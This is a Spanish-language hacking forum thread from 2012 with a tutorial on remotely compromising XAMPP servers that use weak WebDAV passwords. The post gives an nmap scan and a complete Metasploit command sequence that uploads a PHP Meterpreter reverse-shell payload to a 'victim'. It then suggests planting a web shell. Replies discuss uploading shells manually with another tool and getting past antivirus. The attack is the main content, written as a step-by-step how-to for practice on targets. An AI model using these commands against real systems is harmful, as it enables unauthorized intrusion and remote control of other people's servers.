send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)

  • 4 Respuestas
  • 3949 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« en: Diciembre 22, 2012, 04:31:14 pm »

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.

La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Actualmente el servicio XAMPP, usado por la mayoria de webmasters y usuarios que se dedican a la Programación Web son totalmente vulnerables y se ha creado un modulo en metasploit que explota contraseñas débiles WebDAV en los servidores XAMPP y utiliza credenciales proporcionadas para subir una carga útil de PHP y ejecutarlo. El exploit se encuentra disponible desde You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:

REQUERIMIENTOS:

- BackTrack 5 R1 - R2 o R3 (Atacante)
- Metasploit Framework (Atacante)
- Windows XP - 7 - 8 (Victima)
- XAMPP (Victima)

PROCEDIMIENTOS:

Primeramente tenemos que detectar si la PC victima esta ejecutando el servicio XAMPP, para ello usaremos Nmap, ejecutando el siguiente comando:
Código: Text
  1. nmap -sS -T4 -A 192.168.1.38


Si los resultados se muestran tal cual con la imagen de arriba, quiere decir que la PC victima esta ejecutando el servicio XAMPP en el puerto 80 y 443, entonces para aprovecharnos de la vulnerabilidad mencionada lineas arriba, simplemente abriremos metasploit y ejecutamos los siguientes comandos:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
use exploit/windows/http/xampp_webdav_upload_php
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.36 (Nuestra IP)
set RHOST 192.168.1.38 (IP Victima)
exploit

Estos comandos haran que se ejecute un payload en php la cual automaticamente se "subira" en el servicio XAMPP de la PC victima.


Seguidamente si todo se realizo correctamente, recibiremos la session meterpreter gracias al payload que metasploit subio al servicio XAMPP vulnerable.


Lo demas ya queda a nuestra total disposicion, en este caso podemos subir una web shell ya que XAMPP es un servicio web, por lo que podemos ingresar desde nuestro navegador a la IP vulnerada y ejecutar comandos desde la shell.

Espero les sirva y practiquen ;)
« Última modificación: Noviembre 23, 2014, 01:23:45 pm por Expermicid »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #1 en: Diciembre 22, 2012, 09:00:54 pm »
Limpio tema , pero si estoy de acuerdo en  quien hizo este payload anda algo tocao del tarro.
Una cosa es automatizar procesos y otro muy distinto que hagan todo por ti.

Reabierto.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #2 en: Diciembre 22, 2012, 11:42:33 pm »
Cuando uno conoce sobre las vulnerabilidades y la forma de explotar manualmente, puede realizar el mismo ataque automatizado.

Y como dice el usuario Matabarras, esta se puede explotar usando el programa que menciona, como también con el Metasploit, tal cual se muestra en este post y con ambos se obtiene el mismo resultado, solo varian la forma en que el usuario pueda realizar sus pruebas.

Saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #3 en: Diciembre 23, 2012, 08:10:55 pm »
Bueno aparte, de lo que ya dije.

Es mejor de forma manual o con Bitkinex, por varios motivos..
Entre ellos, que si la 'victima' tiene antivirus, y la shell de msf, es detectada, la borra.

En cambio así puedo subir la shell que quiera.

Saludos
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #4 en: Diciembre 23, 2012, 10:08:37 pm »
Las pruebas las he realizado en un Sistema Operativo Windows 7 con el Firewall y Antivirus respectivamente activos y el resultado es exitoso.

Existen muchas formas de aprovecharse de alguna vulnerabilidad en una plataforma y/o software, pero siempre el usuario elige lo que mas le convenga.

Es cuestión de gustos, por ejemplo si estoy en Windows puedo usar el programa que mencionas, pero si estoy en linux puedo usar el MSF ya que como vuelvo a repetir con ambos se obtiene el mismo resultado.

Este Post no es con el fin de "obligar" al usuario que opte por realizar dicho método, simplemente se muestra otra manera de ataque en un sistema distinto.

Saludos.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7

Iniciado por CalebBucker

Respuestas: 1
Vistas: 1989
Último mensaje Septiembre 17, 2012, 04:49:25 pm
por Slore
MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit

Iniciado por Stuxnet

Respuestas: 1
Vistas: 3060
Último mensaje Octubre 24, 2014, 09:18:14 pm
por zekurity
CVE-2015-1701 : Windows 7 privilege escalation vulnerability

Iniciado por LionSec

Respuestas: 8
Vistas: 3879
Último mensaje Mayo 22, 2015, 08:02:27 pm
por rand0m
[video] Introducción al Exploiting en Windows x86 by UND3R (Corelan)

Iniciado por .:UND3R:.

Respuestas: 0
Vistas: 944
Último mensaje Marzo 21, 2018, 12:40:31 pm
por .:UND3R:.
Crackear password de administrador en windows usando Backtrack 3

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1992
Último mensaje Febrero 25, 2010, 11:25:50 am
por dracko.rx